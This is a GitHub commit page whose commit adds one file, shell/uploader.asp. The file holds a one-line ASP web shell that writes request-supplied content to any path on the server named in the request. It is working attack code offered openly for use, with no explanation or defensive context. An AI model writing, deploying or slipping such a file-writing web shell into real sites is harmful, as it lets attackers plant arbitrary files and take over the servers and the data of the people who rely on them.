We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent e10ab5a commit 9b0f11fCopy full SHA for 9b0f11f
1 file changed
shell/uploader.asp
@@ -0,0 +1 @@
1
+<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
0 commit comments